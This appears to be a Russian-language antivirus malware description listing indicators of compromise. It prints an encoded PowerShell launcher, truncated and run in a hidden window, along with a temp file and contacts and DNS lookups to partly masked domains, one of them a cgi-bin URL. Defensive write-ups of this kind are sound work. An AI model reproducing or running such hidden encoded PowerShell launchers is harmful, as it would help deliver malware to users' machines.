Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVADkAawAxAG0AcQAyAD0AKAAnAFQAJwArACgAJwBrAHcAYgAnACsAJwA1ADQAJwArACcAXwAnACkAKQA7ACQAVAB2AGoAbAAyAGwAdAA9ACQARQAwAGYAaAA4AHkAaQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\959952.cvr
- 'va###aindia.com':80
- 'va###aindia.com':443
- 'sh####sundar.com':443
- 'cm###aria.com':443
- 'ha##m.app':443
- http://va###aindia.com/cgi-bin/YZ/
- 'va###aindia.com':443
- 'cm###aria.com':443
- 'ha##m.app':443
- DNS ASK va###aindia.com
- DNS ASK sh####sundar.com
- DNS ASK cm###aria.com
- DNS ASK ts##.monster
- DNS ASK ha##m.app
- DNS ASK mu##.health
- DNS ASK la###ike.house
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVADkAawAxAG0AcQAyAD0AKAAnAFQAJwArACgAJwBrAHcAYgAnACsAJwA1ADQAJwArACcAXwAnACkAKQA7ACQAVAB2AGoAbAAyAGwAdAA9ACQARQAwAGYAaAA4AHkAaQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)